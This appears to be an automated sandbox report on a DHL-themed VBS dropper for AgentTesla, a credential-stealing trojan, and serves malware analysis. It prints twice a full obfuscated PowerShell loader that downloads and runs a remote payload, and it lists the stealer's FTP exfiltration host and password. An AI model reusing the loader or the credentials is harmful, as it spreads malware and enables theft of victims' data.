Overview

overview

10

Static

static

1

DHL_RF_202...41.vbs

windows7-x64

10

DHL_RF_202...41.vbs

windows10-2004-x64

8

Analysis

  • max time kernel
    146s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    24-04-2024 01:35

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    DHL_RF_20200712_BN_OTN 0095673441.vbs

  • Size

    59KB

  • MD5

    a2b0a8025751c0f356eddece9a63e4b2

  • SHA1

    bf2d1d20bdd65dc431ae106081d879c6d5ca4ac0

  • SHA256

    40ab2fb30af697ac782ea1609c0488bcaef61dbd1c10f7f851bc19ff1f4764a6

  • SHA512

    a55badf1a5d856875a8a123de1d335593668fbcbb546cfe709166674a39be9c582ccb1b159dce08289161132979a9d896903c884c7569502c997191e7e07d2ab

  • SSDEEP

    768:sP72p/fwNaKj7gHrI0i3wPDPM+A0s2hyOX0Q4afFysrmUYAYB8nq7rPxQyzhgf7:sAukLI1gPDPTxyk0MfFCNqnZ46f7

Score
10/10
agentteslakeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:     ftp
  • Host:
    ftp://ftp.concaribe.com
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    @Ixk.X0Q&I?d

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Detect packed .NET executables. Mostly AgentTeslaV4. 3 IoCs
  • Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers. 3 IoCs
  • Detects executables referencing Windows vault credential objects. Observed in infostealers 3 IoCs
  • Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers 3 IoCs
  • Detects executables referencing many email and collaboration clients. Observed in information stealers 3 IoCs
  • Detects executables referencing many file transfer clients. Observed in information stealers 3 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 29 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DHL_RF_20200712_BN_OTN 0095673441.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:1612
    • C:\Windows\System32\ping.exe
      ping google.com -n 1
      2⤵
      • Runs ping.exe
      PID:2804
    • C:\Windows\System32\ping.exe
      ping %.%.%.%
      2⤵
      • Runs ping.exe
      PID:2536
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c dir
      2⤵
        PID:2732
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Bndslingen = 1;$Delspecifikationens='Substrin';$Delspecifikationens+='g';Function Retssag($Piperales){$Filmoperatrer104=$Piperales.Length-$Bndslingen;For($Conj=5; $Conj -lt $Filmoperatrer104; $Conj+=(6)){$Arbejdsarealets+=$Piperales.$Delspecifikationens.Invoke($Conj, $Bndslingen);}$Arbejdsarealets;}function reformati($irettesttelsers){. ($Radiocalcium) ($irettesttelsers);}$checklistes=Retssag ' orreMStud o verzKl.aki rsnilKn,tnlFj.rnaReins/ etin5A oko.Eussi0Subge Toptr(FreskW U spiSeahonGaca.dAfkasoAare w imbrsMervr An,reNDistrTVelok .mpol1Colou0Luxat.D cim0Unund; Nota AntiWAk yli Motinfrim 6Genfo4Fono,; K ap Pl.ekxDaiko6O,eoy4,oosp;Licen Tarver.etravwass :Ridde1Prolo2sikke1Pardo. .enu0,airc)Kr el FractGRavrre PredcRevivkFodfoo Saar/Subfo2 h ne0Teent1 spil0,tyrt0 Hose1Monod0Circu1Unsty ,ordeFSpytkiReremr In,ee.eratfTopbeoFootix,ands/ nis1Thirt2Hunge1lawye.Measu0Alexi ';$Epicoracoid=Retssag ' R,asU KondsF,emleIns,crDisca- b.nkAErinagRgsjle eintnSalamtSkald ';$Admixing=Retssag 'UdenohTilslt A.dltSeismpFlat :bulgi/Fkali/Instin MisniFodret bog.i ,aauo,reat.SemitcTideroemblemSedim/KildebI divsUnder2.pire/wackiBReeleePre.eaForsgn Udskb nfreaHillsgTimot.bee epA.rinfInd rbField ';$Forligelige=Retssag ' Mget> Even ';$Radiocalcium=Retssag 'Hoodcis lskeClearxKor.i ';$Frivrdi='Bossanova';reformati (Retssag 'Slud,S Logie StaftMisde-OmgaeC VrdioReacqnBekkatForvaeModern stortQuadr Sober-MelliP Gho aWhatztcrypthPheoc KommaTT,eta:Decca\TilsaOStagefdeistfGou.ee,uoporBedrac InteeSanktrEksege G.rpm SpecoDyr,hnHek,eiGalacsHolis.byzontHe aexAnomotSelf. Pulte-aren.V FlocaBetnklGlossuSteppePele. help$ MelaFOkkerr Gol,i SvagvT.skerFil rdDianoi Nonp;del.t ');reformati (Retssag 'OrdeniStraffHippo S.utt(BigastSk.rled trisaguiltOv.rs-Sv nepFo sta strotAnisahBh ta OutleTVeter:Vagtp\AsietOAltruf ,apif rolleEmbe,r ncatcbazo,eProt.r,hiloeTvrg mTrooloEtkamnSelf,iBun.isVot.r.ErgattNa laxGgeput.umbo)Di or{TematePrveuxPhlebiLapnitDiscr}Tilba;Ferah ');$Tock = Retssag 'CalsgeSviptc Non.hLiv.kos igm isosm% HnenaTilenpLsrivpSy.tedAdvokaC,ssptStrena,noot%.mmen\ GoofJb,skauSjakfn nitegTaxake Ko.bnPhospscrisp. DrukSLecheeFremtnHvs.k Fugle& Bo.g&Bille nonvie SnkecDoublhOut,uo,ykml Bevar$Lilac ';reformati (Retssag ' Cons$Styrkgencoul hotooPluk.bS,rataLivful L bo:EjerlFUnir,oBlevetEkstro latid ,enee F,lkt LongeSammek Unact TeleoForskrSlukne SamsnSeabasVinkl=Po,te( KatecFunktmSinkedP.lit Roko./CourtcAstro Phyll$HovedTwh,rloInjurcM crokSov,b)Po.os ');reformati (Retssag 'Wetla$HabilgLogoplUngenoEja,ubWartha Matel Seat:BratsFanartoArcadrSympaihove.vSkrfer lavie Recelbushes C.ckeTermirOrche=Sa le$UdbytASkrald olkm KarniAlt.nxSurmai HabinAn.ecgKlara.HenvesSpectp StamlReatti Malttbanem(Outlo$EksprF istuoTilbarOla.alAfh giAfgifgover,eDishal TriliTegnegUnderePelor)indg. ');$Admixing=$Forivrelser[0];reformati (Retssag 'uskok$Imburg SandlSpecio itotbCathoaPropilJoca,: FlyvHVold,oWoefus Viele DatakPe.tarDagbdmV,ctrmLienieP oanr,kydeeI.ternBoninsGaleo=LemlsN CarbePrivaw Zoon-tasb.OIndusbExcrejhe ste SphecRiddetSe uc AfvanSSemigyWhirlsUndertSel,eeM rphm,atin.CemenN,atabeSta.st Mest.N.rinW spone,amoabdiploC yperlHebetiBlnd.eHeternUdskitSam s ');reformati (Retssag ' Doce$C,libHFrieroLastns.ortre Su dk Chirr,paakmSodommImpo,eCl nsrUnsale P,dsndesuesCogi..UnderHNondie Ldrea AlmadManoge.imnor BatcsImcnt[ Kont$ Gog.EHe depPigmeimonarcAladeo Op,jrSvrmeaSchizc Ca koSpidsiG.nendSpina]Un.on=Jyskh$terr,cPredeh.ordoe SkrmcKoombkDjvlelFllesi ilsis Chevt BuroeBag.psPubli ');$Goutte=Retssag 'BestnH Bas o Totas Afs,eForspkIntomrNegermFelixmrisikeWorsurCom ee gal nS epusChalc.,ncobD revbo DewcwKancenSinful Sieuo ordsa Nondd S,gmFWhit.i Ep plEjerke Navn(Patho$DikarA Kored Tu.omStratiOustexSoleli sej,nMultigScopu,,ykel$ZierkEGonysnOctadgTe til,eedsaThoradSstnidInt re Ge.onMnste) snit ';$Goutte=$Fotodetektorens[1]+$Goutte;$Engladden=$Fotodetektorens[0];reformati (Retssag ' Eman$HelligRugbylDi,nyoDro.cbRumstaDioxal Lite: UnraASh ttn WindtUnenteI excrJamese Nontv RaahoMeterlStedsuTop.it UbesiHalvaoForsmnBloksaStranlpodzo=Plads(ApishTSmilee,etais Resyt Boss-NonpuP Afs,aGustytRustihSie,e tak s$SpiseESvrmen Frang FugilkorkeaTentadEnogtd Disoe SamknKrong)Equip ');while (!$Anterevolutional) {reformati (Retssag 'Earta$Commug Kir,lNedd,oHjlpeb CabbaSalvelAnhol:Afna,V HenfeImporsNeb liNskedc In buQuartpP.aleaSdumppBroncuUnderlExhilaDkfa,rMo,ai=S run$B soltLezz.ra.arku ForpeT dss ') ;reformati $Goutte;reformati (Retssag ' Ro,iSdrmndt GaasaTnderrForbotRi da-DepraSdolinlDockie troseFoderpFuldm ,orel4cinna ');reformati (Retssag 'Monot$ Met,g Nonnl oninoBoghob.teliaFilmilSamle:antiaAInvesnKavalt evele Imagrandroe Karmv SquioFor,alSty,euSelv,tGiroeiA,magoPers nHuleda k.nsl Dep.=Hep e(Neap TC,ryseAditcsferietMalle-HectaPBarr.aUltratMi fihMedi. ,laat$AnarcEHeptanindlagUng,alLevitaGrinedSherrd Fe,eeVildtnFella) Kamp ') ;reformati (Retssag 'I,cre$SubpugServ.lBill oPo tib FilmaPuliclHotte:Frst,p.lvhoaK,eptn.rveuo DukarAn.rea Mutam Ele.aLseples,yklrNoninn egale Spre=Death$.aisagUnperlCiselo PargbRampaaCh,rtlReek :EndurUDupnin Swo bExiguoActornMiltoe ,ese+ Skr +M.rke% Sjov$ Ske,FApparoBegavrReforiMinikvReparrBrylleFi.kel Spi sSextae MaskrUl,ra.oldefcNutrioLea,iuAdieuncaffst,enin ') ;$Admixing=$Forivrelser[$panoramaerne];}reformati (Retssag 'Turci$CommogTraeslPlejeoDagcebNedkmaEkspolNonre:LiderE HimalDobbef,urdeu.ompls Sensi OvaroC.risnUreth .arch=Polyt jingsGSuf.oeu,komtRen,g-parapCPosito Disen,ivsltUndereprogrnC lentDo.er Subs$Bodi,ER.mannTrocagK ballMa.rkaResu,dExtradSca,ee CellnDe.ec ');reformati (Retssag ' W en$KodeogSclerlPutamoSemi,bMi.eraValgcl Fula:tubersPhotouBoligpEnsanpMonocrAnklaiK,dnimghet.eBrigsrDdskniEupolnNaalegCochleP.apenLokal Pu ul=dokha Ch f[MonotS awfyPentas D.bet,ypsoe SeramKathi.RepraC tropoSteign.rvlevLifeweLavenrmarkrtOverb]Snadr:Srett:Rec.mFfa.lbrLanthoThenamDenarB lagta CentsGylp ePanor6Mistn4Cr.tcSFoliotGrundr Am,riLustrnJack.g Mout(Homo,$,riftE ActolHjul,fBondeuBy.hesKltriiNedl,o.rovinbefol)reluc ');reformati (Retssag 'Lyo,n$SammegCo relJagheoRollebDecomaThemsl Kurs: SporSHu nun .lode HalofK,nkuoAgonigCarp.e Semit.hithsbanta Udpen= Brne Barbo[,adroSPanmeytekstsSalmotJ ckse Eur.morang.RelatT Unale Ge.exNonintRecli.FiskeEOxidinFilbecSm,otoLstandCardii No.enVerbagOpium]Defib:Svo l:PrehuA SmaaSSalesCMigh,IKdebrID dak.ComplGLovgeeKaprotAromaS arestPeritrIn.uriDic.cnOla.tg Tumm(Besvr$ tivnsSouchuDrea.p .rstp.idsrrDigi.i FlammTrocheGypsyrDyrehi BanknPuddegRubeoe,astinPlade)retni ');reformati (Retssag 'Carri$Pa,ndgMi itlPsykioWap.eb naiaaNephrlHydro:St,viB Dimyr Ind aAcet,nOutvod tivnhAss sr RskegL pareHemihtJetfl=Assi.$MurraS AfprnUrolieBurgefBryozo SkrugMagt e opinttrapps Pang.FravisNans.uUnderb,lavesFocustNonv,rRefrni lyannMishigadvo,( .her2Magne9 Tilb7Mekan4 ill9Bestr8rev l, Rebu2Voldt8Ndtrf6Udrej2,iskv0 .lds)Corri ');reformati $Brandhrget;"
        2⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2512
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Jungens.Sen && echo $"
          3⤵
            PID:2440
          • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Bndslingen = 1;$Delspecifikationens='Substrin';$Delspecifikationens+='g';Function Retssag($Piperales){$Filmoperatrer104=$Piperales.Length-$Bndslingen;For($Conj=5; $Conj -lt $Filmoperatrer104; $Conj+=(6)){$Arbejdsarealets+=$Piperales.$Delspecifikationens.Invoke($Conj, $Bndslingen);}$Arbejdsarealets;}function reformati($irettesttelsers){. ($Radiocalcium) ($irettesttelsers);}$checklistes=Retssag ' orreMStud o verzKl.aki rsnilKn,tnlFj.rnaReins/ etin5A oko.Eussi0Subge Toptr(FreskW U spiSeahonGaca.dAfkasoAare w imbrsMervr An,reNDistrTVelok .mpol1Colou0Luxat.D cim0Unund; Nota AntiWAk yli Motinfrim 6Genfo4Fono,; K ap Pl.ekxDaiko6O,eoy4,oosp;Licen Tarver.etravwass :Ridde1Prolo2sikke1Pardo. .enu0,airc)Kr el FractGRavrre PredcRevivkFodfoo Saar/Subfo2 h ne0Teent1 spil0,tyrt0 Hose1Monod0Circu1Unsty ,ordeFSpytkiReremr In,ee.eratfTopbeoFootix,ands/ nis1Thirt2Hunge1lawye.Measu0Alexi ';$Epicoracoid=Retssag ' R,asU KondsF,emleIns,crDisca- b.nkAErinagRgsjle eintnSalamtSkald ';$Admixing=Retssag 'UdenohTilslt A.dltSeismpFlat :bulgi/Fkali/Instin MisniFodret bog.i ,aauo,reat.SemitcTideroemblemSedim/KildebI divsUnder2.pire/wackiBReeleePre.eaForsgn Udskb nfreaHillsgTimot.bee epA.rinfInd rbField ';$Forligelige=Retssag ' Mget> Even ';$Radiocalcium=Retssag 'Hoodcis lskeClearxKor.i ';$Frivrdi='Bossanova';reformati (Retssag 'Slud,S Logie StaftMisde-OmgaeC VrdioReacqnBekkatForvaeModern stortQuadr Sober-MelliP Gho aWhatztcrypthPheoc KommaTT,eta:Decca\TilsaOStagefdeistfGou.ee,uoporBedrac InteeSanktrEksege G.rpm SpecoDyr,hnHek,eiGalacsHolis.byzontHe aexAnomotSelf. Pulte-aren.V FlocaBetnklGlossuSteppePele. help$ MelaFOkkerr Gol,i SvagvT.skerFil rdDianoi Nonp;del.t ');reformati (Retssag 'OrdeniStraffHippo S.utt(BigastSk.rled trisaguiltOv.rs-Sv nepFo sta strotAnisahBh ta OutleTVeter:Vagtp\AsietOAltruf ,apif rolleEmbe,r ncatcbazo,eProt.r,hiloeTvrg mTrooloEtkamnSelf,iBun.isVot.r.ErgattNa laxGgeput.umbo)Di or{TematePrveuxPhlebiLapnitDiscr}Tilba;Ferah ');$Tock = Retssag 'CalsgeSviptc Non.hLiv.kos igm isosm% HnenaTilenpLsrivpSy.tedAdvokaC,ssptStrena,noot%.mmen\ GoofJb,skauSjakfn nitegTaxake Ko.bnPhospscrisp. DrukSLecheeFremtnHvs.k Fugle& Bo.g&Bille nonvie SnkecDoublhOut,uo,ykml Bevar$Lilac ';reformati (Retssag ' Cons$Styrkgencoul hotooPluk.bS,rataLivful L bo:EjerlFUnir,oBlevetEkstro latid ,enee F,lkt LongeSammek Unact TeleoForskrSlukne SamsnSeabasVinkl=Po,te( KatecFunktmSinkedP.lit Roko./CourtcAstro Phyll$HovedTwh,rloInjurcM crokSov,b)Po.os ');reformati (Retssag 'Wetla$HabilgLogoplUngenoEja,ubWartha Matel Seat:BratsFanartoArcadrSympaihove.vSkrfer lavie Recelbushes C.ckeTermirOrche=Sa le$UdbytASkrald olkm KarniAlt.nxSurmai HabinAn.ecgKlara.HenvesSpectp StamlReatti Malttbanem(Outlo$EksprF istuoTilbarOla.alAfh giAfgifgover,eDishal TriliTegnegUnderePelor)indg. ');$Admixing=$Forivrelser[0];reformati (Retssag 'uskok$Imburg SandlSpecio itotbCathoaPropilJoca,: FlyvHVold,oWoefus Viele DatakPe.tarDagbdmV,ctrmLienieP oanr,kydeeI.ternBoninsGaleo=LemlsN CarbePrivaw Zoon-tasb.OIndusbExcrejhe ste SphecRiddetSe uc AfvanSSemigyWhirlsUndertSel,eeM rphm,atin.CemenN,atabeSta.st Mest.N.rinW spone,amoabdiploC yperlHebetiBlnd.eHeternUdskitSam s ');reformati (Retssag ' Doce$C,libHFrieroLastns.ortre Su dk Chirr,paakmSodommImpo,eCl nsrUnsale P,dsndesuesCogi..UnderHNondie Ldrea AlmadManoge.imnor BatcsImcnt[ Kont$ Gog.EHe depPigmeimonarcAladeo Op,jrSvrmeaSchizc Ca koSpidsiG.nendSpina]Un.on=Jyskh$terr,cPredeh.ordoe SkrmcKoombkDjvlelFllesi ilsis Chevt BuroeBag.psPubli ');$Goutte=Retssag 'BestnH Bas o Totas Afs,eForspkIntomrNegermFelixmrisikeWorsurCom ee gal nS epusChalc.,ncobD revbo DewcwKancenSinful Sieuo ordsa Nondd S,gmFWhit.i Ep plEjerke Navn(Patho$DikarA Kored Tu.omStratiOustexSoleli sej,nMultigScopu,,ykel$ZierkEGonysnOctadgTe til,eedsaThoradSstnidInt re Ge.onMnste) snit ';$Goutte=$Fotodetektorens[1]+$Goutte;$Engladden=$Fotodetektorens[0];reformati (Retssag ' Eman$HelligRugbylDi,nyoDro.cbRumstaDioxal Lite: UnraASh ttn WindtUnenteI excrJamese Nontv RaahoMeterlStedsuTop.it UbesiHalvaoForsmnBloksaStranlpodzo=Plads(ApishTSmilee,etais Resyt Boss-NonpuP Afs,aGustytRustihSie,e tak s$SpiseESvrmen Frang FugilkorkeaTentadEnogtd Disoe SamknKrong)Equip ');while (!$Anterevolutional) {reformati (Retssag 'Earta$Commug Kir,lNedd,oHjlpeb CabbaSalvelAnhol:Afna,V HenfeImporsNeb liNskedc In buQuartpP.aleaSdumppBroncuUnderlExhilaDkfa,rMo,ai=S run$B soltLezz.ra.arku ForpeT dss ') ;reformati $Goutte;reformati (Retssag ' Ro,iSdrmndt GaasaTnderrForbotRi da-DepraSdolinlDockie troseFoderpFuldm ,orel4cinna ');reformati (Retssag 'Monot$ Met,g Nonnl oninoBoghob.teliaFilmilSamle:antiaAInvesnKavalt evele Imagrandroe Karmv SquioFor,alSty,euSelv,tGiroeiA,magoPers nHuleda k.nsl Dep.=Hep e(Neap TC,ryseAditcsferietMalle-HectaPBarr.aUltratMi fihMedi. ,laat$AnarcEHeptanindlagUng,alLevitaGrinedSherrd Fe,eeVildtnFella) Kamp ') ;reformati (Retssag 'I,cre$SubpugServ.lBill oPo tib FilmaPuliclHotte:Frst,p.lvhoaK,eptn.rveuo DukarAn.rea Mutam Ele.aLseples,yklrNoninn egale Spre=Death$.aisagUnperlCiselo PargbRampaaCh,rtlReek :EndurUDupnin Swo bExiguoActornMiltoe ,ese+ Skr +M.rke% Sjov$ Ske,FApparoBegavrReforiMinikvReparrBrylleFi.kel Spi sSextae MaskrUl,ra.oldefcNutrioLea,iuAdieuncaffst,enin ') ;$Admixing=$Forivrelser[$panoramaerne];}reformati (Retssag 'Turci$CommogTraeslPlejeoDagcebNedkmaEkspolNonre:LiderE HimalDobbef,urdeu.ompls Sensi OvaroC.risnUreth .arch=Polyt jingsGSuf.oeu,komtRen,g-parapCPosito Disen,ivsltUndereprogrnC lentDo.er Subs$Bodi,ER.mannTrocagK ballMa.rkaResu,dExtradSca,ee CellnDe.ec ');reformati (Retssag ' W en$KodeogSclerlPutamoSemi,bMi.eraValgcl Fula:tubersPhotouBoligpEnsanpMonocrAnklaiK,dnimghet.eBrigsrDdskniEupolnNaalegCochleP.apenLokal Pu ul=dokha Ch f[MonotS awfyPentas D.bet,ypsoe SeramKathi.RepraC tropoSteign.rvlevLifeweLavenrmarkrtOverb]Snadr:Srett:Rec.mFfa.lbrLanthoThenamDenarB lagta CentsGylp ePanor6Mistn4Cr.tcSFoliotGrundr Am,riLustrnJack.g Mout(Homo,$,riftE ActolHjul,fBondeuBy.hesKltriiNedl,o.rovinbefol)reluc ');reformati (Retssag 'Lyo,n$SammegCo relJagheoRollebDecomaThemsl Kurs: SporSHu nun .lode HalofK,nkuoAgonigCarp.e Semit.hithsbanta Udpen= Brne Barbo[,adroSPanmeytekstsSalmotJ ckse Eur.morang.RelatT Unale Ge.exNonintRecli.FiskeEOxidinFilbecSm,otoLstandCardii No.enVerbagOpium]Defib:Svo l:PrehuA SmaaSSalesCMigh,IKdebrID dak.ComplGLovgeeKaprotAromaS arestPeritrIn.uriDic.cnOla.tg Tumm(Besvr$ tivnsSouchuDrea.p .rstp.idsrrDigi.i FlammTrocheGypsyrDyrehi BanknPuddegRubeoe,astinPlade)retni ');reformati (Retssag 'Carri$Pa,ndgMi itlPsykioWap.eb naiaaNephrlHydro:St,viB Dimyr Ind aAcet,nOutvod tivnhAss sr RskegL pareHemihtJetfl=Assi.$MurraS AfprnUrolieBurgefBryozo SkrugMagt e opinttrapps Pang.FravisNans.uUnderb,lavesFocustNonv,rRefrni lyannMishigadvo,( .her2Magne9 Tilb7Mekan4 ill9Bestr8rev l, Rebu2Voldt8Ndtrf6Udrej2,iskv0 .lds)Corri ');reformati $Brandhrget;"
            3⤵
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:772
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Jungens.Sen && echo $"
              4⤵
                PID:1616
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe"
                4⤵
                • Suspicious use of NtCreateThreadExHideFromDebugger
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:932

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Roaming\Jungens.Sen
          Filesize

          424KB

          MD5

          4fd9c090f9003deb232b98bc3c7f0839

          SHA1

          62137b0eafac5458e519ddbaa0570ed8ee03de6f

          SHA256

          c2287c9e9054ba54e6746b679e821e10aa224b0e5ab912e202f85a3b3f248db3

          SHA512

          548edf41f54dbaf8111437de796d36cb1ef95c943cb86f83efe407044bbe5f5ac6314db183b032342e4992ddd24ee274063bce598a93a815e2daac59a8a18449

          Download Submit
        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\I68PL6JBT79TR7C16NK1.temp
          Filesize

          7KB

          MD5

          ba976123a3b4aab4a1f77eb28e36a50f

          SHA1

          86d19a9bad02473946c7211931ef7cf3f072bc21

          SHA256

          dff5bb4cbf4b4ea53a6a003075a56dfc145c77ffb725bd88d3220ef027f30d6f

          SHA512

          fa52597b513c5777f53b246ad51b85b61ef283646b4b8caa606b418e9b4ca6be094745c01df03429cfb981ed615ab1063b5b6ab74408465ffd3da32d6c941a1f

          Download Submit
        • memory/772-42-0x0000000002650000-0x0000000002690000-memory.dmp
          Filesize

          256KB

          Download
        • memory/772-46-0x0000000072D00000-0x00000000732AB000-memory.dmp
          Filesize

          5.7MB

          Download
        • memory/772-45-0x0000000002650000-0x0000000002690000-memory.dmp
          Filesize

          256KB

          Download
        • memory/772-61-0x0000000072D00000-0x00000000732AB000-memory.dmp
          Filesize

          5.7MB

          Download
        • memory/772-54-0x0000000076EB0000-0x0000000076F86000-memory.dmp
          Filesize

          856KB

          Download
        • memory/772-53-0x0000000076CC0000-0x0000000076E69000-memory.dmp
          Filesize

          1.7MB

          Download
        • memory/772-52-0x0000000005C90000-0x0000000005D90000-memory.dmp
          Filesize

          1024KB

          Download
        • memory/772-34-0x0000000002650000-0x0000000002690000-memory.dmp
          Filesize

          256KB

          Download
        • memory/772-33-0x0000000002650000-0x0000000002690000-memory.dmp
          Filesize

          256KB

          Download
        • memory/772-35-0x0000000072D00000-0x00000000732AB000-memory.dmp
          Filesize

          5.7MB

          Download
        • memory/772-50-0x0000000002650000-0x0000000002690000-memory.dmp
          Filesize

          256KB

          Download
        • memory/772-37-0x0000000002650000-0x0000000002690000-memory.dmp
          Filesize

          256KB

          Download
        • memory/772-48-0x0000000006420000-0x0000000009B44000-memory.dmp
          Filesize

          55.1MB

          Download
        • memory/772-47-0x0000000004FF0000-0x0000000004FF1000-memory.dmp
          Filesize

          4KB

          Download
        • memory/772-44-0x0000000072D00000-0x00000000732AB000-memory.dmp
          Filesize

          5.7MB

          Download
        • memory/772-32-0x0000000072D00000-0x00000000732AB000-memory.dmp
          Filesize

          5.7MB

          Download
        • memory/772-43-0x0000000005C90000-0x0000000005D90000-memory.dmp
          Filesize

          1024KB

          Download
        • memory/932-56-0x0000000076EE6000-0x0000000076EE7000-memory.dmp
          Filesize

          4KB

          Download
        • memory/932-57-0x0000000076EB0000-0x0000000076F86000-memory.dmp
          Filesize

          856KB

          Download
        • memory/932-62-0x0000000000390000-0x00000000003D2000-memory.dmp
          Filesize

          264KB

          Download
        • memory/932-69-0x0000000022E10000-0x0000000022E50000-memory.dmp
          Filesize

          256KB

          Download
        • memory/932-68-0x000000006E9B0000-0x000000006F09E000-memory.dmp
          Filesize

          6.9MB

          Download
        • memory/932-65-0x0000000022E10000-0x0000000022E50000-memory.dmp
          Filesize

          256KB

          Download
        • memory/932-64-0x000000006E9B0000-0x000000006F09E000-memory.dmp
          Filesize

          6.9MB

          Download
        • memory/932-59-0x0000000000390000-0x00000000013F2000-memory.dmp
          Filesize

          16.4MB

          Download
        • memory/932-60-0x0000000076EB0000-0x0000000076F86000-memory.dmp
          Filesize

          856KB

          Download
        • memory/932-58-0x0000000000390000-0x00000000013F2000-memory.dmp
          Filesize

          16.4MB

          Download
        • memory/932-55-0x0000000076CC0000-0x0000000076E69000-memory.dmp
          Filesize

          1.7MB

          Download
        • memory/2512-36-0x000007FEF50B0000-0x000007FEF5A4D000-memory.dmp
          Filesize

          9.6MB

          Download
        • memory/2512-24-0x0000000001E80000-0x0000000001E88000-memory.dmp
          Filesize

          32KB

          Download
        • memory/2512-27-0x00000000028F0000-0x0000000002970000-memory.dmp
          Filesize

          512KB

          Download
        • memory/2512-25-0x00000000028F0000-0x0000000002970000-memory.dmp
          Filesize

          512KB

          Download
        • memory/2512-23-0x000000001B220000-0x000000001B502000-memory.dmp
          Filesize

          2.9MB

          Download
        • memory/2512-21-0x000007FEF50B0000-0x000007FEF5A4D000-memory.dmp
          Filesize

          9.6MB

          Download
        • memory/2512-26-0x00000000028F0000-0x0000000002970000-memory.dmp
          Filesize

          512KB

          Download
        • memory/2512-63-0x000007FEF50B0000-0x000007FEF5A4D000-memory.dmp
          Filesize

          9.6MB

          Download
        • memory/2512-41-0x00000000028F0000-0x0000000002970000-memory.dmp
          Filesize

          512KB

          Download
        • memory/2512-22-0x00000000028F0000-0x0000000002970000-memory.dmp
          Filesize

          512KB

          Download
        • memory/2512-39-0x00000000028F0000-0x0000000002970000-memory.dmp
          Filesize

          512KB

          Download
        • memory/2512-40-0x00000000028F0000-0x0000000002970000-memory.dmp
          Filesize

          512KB

          Download